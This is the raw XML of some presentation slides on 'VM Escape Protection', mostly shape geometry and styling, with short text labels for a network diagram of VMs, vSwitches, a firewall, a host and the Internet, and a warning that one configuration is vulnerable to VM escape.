                <a:lnTo>
                  <a:pt x="65024" y="41910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76835" y="15875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90143" y="15875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113538" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="748030" h="2112645">
                <a:moveTo>
                  <a:pt x="70876" y="29008"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="65024" y="41910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74382" y="46189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70876" y="29008"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="748030" h="2112645">
                <a:moveTo>
                  <a:pt x="76835" y="15875"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="70916" y="28921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84795" y="19503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76835" y="15875"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="748030" h="2112645">
                <a:moveTo>
                  <a:pt x="90143" y="15875"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="76835" y="15875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84795" y="19503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90143" y="15875"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="5496D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68740" y="5526023"/>
            <a:ext cx="541020" cy="541019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03696" y="306451"/>
            <a:ext cx="384873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310">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escape</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protection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36691" y="760476"/>
            <a:ext cx="5254752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42028" y="1933193"/>
            <a:ext cx="816737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This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configuration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is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highly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vulnerable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VM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escaping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attack.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05628" y="7714488"/>
            <a:ext cx="5386070" cy="760730"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5386070" h="760729">
                <a:moveTo>
                  <a:pt x="5259070" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126746" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77420" y="9963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37131" y="37131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9963" y="77420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="126745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="633729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9963" y="683066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37131" y="723353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77420" y="750516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126746" y="760475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5259070" y="760475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5308395" y="750516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5348684" y="723353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5375852" y="683066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5385816" y="633729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5385816" y="126745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5375852" y="77420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5348684" y="37131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5308395" y="9963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5259070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599557" y="7900517"/>
            <a:ext cx="500062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95">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Col</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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apsi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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7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z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30">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>nes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vir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ual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z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devices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659633" y="2539238"/>
            <a:ext cx="6504305" cy="3037205"/>
            <a:chOff x="2659633" y="2539238"/>
            <a:chExt cx="6504305" cy="3037205"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7181849" y="2551938"/>
              <a:ext cx="1969135" cy="1664335"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1969134" h="1664335">
                  <a:moveTo>
                    <a:pt x="0" y="277367"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4469" y="227517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17355" y="180595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37874" y="137385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65241" y="98673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98673" y="65241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137385" y="37874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180595" y="17355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227517" y="4469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277368" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1691640" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1741490" y="4469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788412" y="17355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1831622" y="37874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1870334" y="65241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1903766" y="98673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931133" y="137385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1951652" y="180595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1964538" y="227517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1969007" y="277367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1969007" y="1386839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1964538" y="1436690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1951652" y="1483612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931133" y="1526822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1903766" y="1565534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1870334" y="1598966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1831622" y="1626333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788412" y="1646852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1741490" y="1659738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1691640" y="1664207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277368" y="1664207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227517" y="1659738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180595" y="1646852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137385" y="1626333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98673" y="1598966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65241" y="1565534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37874" y="1526822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17355" y="1483612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4469" y="1436690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1386839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="277367"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="0ECFE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36180" y="2731008"/>
              <a:ext cx="998220" cy="55930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69480" y="3470148"/>
              <a:ext cx="998220" cy="55930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54339" y="3087624"/>
              <a:ext cx="998220" cy="55930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672333" y="3560826"/>
              <a:ext cx="1856739" cy="2002789"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1856739" h="2002789">
                  <a:moveTo>
                    <a:pt x="0" y="309372"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3355" y="263665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13102" y="220038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28761" y="178968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49853" y="140936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75899" y="106420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106420" y="75899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140936" y="49853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178968" y="28761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220038" y="13102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263665" y="3355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309372" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1546860" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1592566" y="3355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1636193" y="13102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1677263" y="28761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1715295" y="49853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1749811" y="75899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1780332" y="106420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806378" y="140936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827470" y="178968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1843129" y="220038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1852876" y="263665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1856232" y="309372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1856232" y="1693164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1852876" y="1738870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1843129" y="1782497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827470" y="1823567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806378" y="1861599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1780332" y="1896115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1749811" y="1926636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1715295" y="1952682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1677263" y="1973774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1636193" y="1989433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1592566" y="1999180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1546860" y="2002536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309372" y="2002536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263665" y="1999180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220038" y="1989433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178968" y="1973774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140936" y="1952682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106420" y="1926636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75899" y="1896115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49853" y="1861599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28761" y="1823567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13102" y="1782497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3355" y="1738870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1693164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="309372"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="0ECFE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20923" y="3995927"/>
              <a:ext cx="848868" cy="7437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8059" y="3995927"/>
              <a:ext cx="850391" cy="7437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11779" y="4818888"/>
              <a:ext cx="809244" cy="70713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3116326" y="3728084"/>
            <a:ext cx="29400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latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>VM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70757" y="3740276"/>
            <a:ext cx="29400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latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>VM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736975" y="5048453"/>
            <a:ext cx="65532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0">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>vSwitch</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode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1925554" y="3433826"/>
            <a:ext cx="1882139" cy="2028189"/>
            <a:chOff x="11925554" y="3433826"/>
            <a:chExt cx="1882139" cy="2028189"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11938254" y="3446526"/>
              <a:ext cx="1856739" cy="2002789"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1856740" h="2002789">
                  <a:moveTo>
                    <a:pt x="0" y="309372"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3355" y="263665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13102" y="220038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28761" y="178968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49853" y="140936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75899" y="106420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106420" y="75899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140936" y="49853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178968" y="28761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220038" y="13102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263665" y="3355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309372" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1546859" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1592566" y="3355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1636193" y="13102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1677263" y="28761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1715295" y="49853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1749811" y="75899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1780332" y="106420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806378" y="140936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827470" y="178968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1843129" y="220038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1852876" y="263665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1856232" y="309372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1856232" y="1693164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1852876" y="1738870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1843129" y="1782497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827470" y="1823567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806378" y="1861599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1780332" y="1896115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1749811" y="1926636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1715295" y="1952682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1677263" y="1973774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1636193" y="1989433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1592566" y="1999180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1546859" y="2002536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309372" y="2002536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263665" y="1999180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220038" y="1989433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178968" y="1973774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140936" y="1952682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106420" y="1926636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75899" y="1896115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49853" y="1861599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28761" y="1823567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13102" y="1782497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3355" y="1738870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1693164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="309372"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="0ECFE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86844" y="3881628"/>
              <a:ext cx="850392" cy="74371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95504" y="3881628"/>
              <a:ext cx="848867" cy="7437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77700" y="4704588"/>
              <a:ext cx="809244" cy="707136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2383516" y="3614165"/>
            <a:ext cx="29400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latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>VM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037946" y="3625976"/>
            <a:ext cx="29400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latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>VM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004418" y="4934838"/>
            <a:ext cx="65468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>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-20">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Switch</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode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775204" y="5873496"/>
            <a:ext cx="5718175" cy="830580"/>
            <a:chOff x="2775204" y="5873496"/>
            <a:chExt cx="5718175" cy="830580"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="object 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3516630" y="6275070"/>
              <a:ext cx="2045335" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2045335" h="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2045081" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0ECFE8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75204" y="5903976"/>
              <a:ext cx="740664" cy="74066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361938" y="6275070"/>
              <a:ext cx="1331595" cy="29845"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1331595" h="29845">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1331340" y="29717"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0ECFE8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61076" y="5873496"/>
              <a:ext cx="800100" cy="80162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93151" y="5903976"/>
              <a:ext cx="800100" cy="800100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2701544" y="6820281"/>
            <a:ext cx="78549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5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Int</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rn</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-35">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t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584316" y="6834378"/>
            <a:ext cx="7512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30">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Firewall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938007" y="6876998"/>
            <a:ext cx="46482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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-65">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-35">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="object 3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760207" y="4477511"/>
            <a:ext cx="807720" cy="708660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7798434" y="5122545"/>
            <a:ext cx="73977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latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>vSwitch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541520" y="4215384"/>
            <a:ext cx="7396480" cy="659130"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7396480" h="659129">
                <a:moveTo>
                  <a:pt x="0" y="619251"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3218687" y="615695"/>
                </a:lnTo>
              </a:path>
              <a:path w="7396480" h="659129">
                <a:moveTo>
                  <a:pt x="4026407" y="615695"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7395972" y="658876"/>
                </a:lnTo>
              </a:path>
              <a:path w="7396480" h="659129">
                <a:moveTo>
                  <a:pt x="3622548" y="263143"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3624706" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="5496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9555860" y="3273933"/>
            <a:ext cx="41211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40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>LAN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068573" y="3142868"/>
            <a:ext cx="11766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25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-85">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Ser</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ice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1872976" y="5584063"/>
            <a:ext cx="202628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29920" marR="5080" indent="-617220">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-30">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Middleware/Backend </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-495">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Services</a:t>
            </a:r>
            <a:endParaRPr sz="1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03696" y="306451"/>
            <a:ext cx="384873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310">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escape</a:t>
            </a:r>
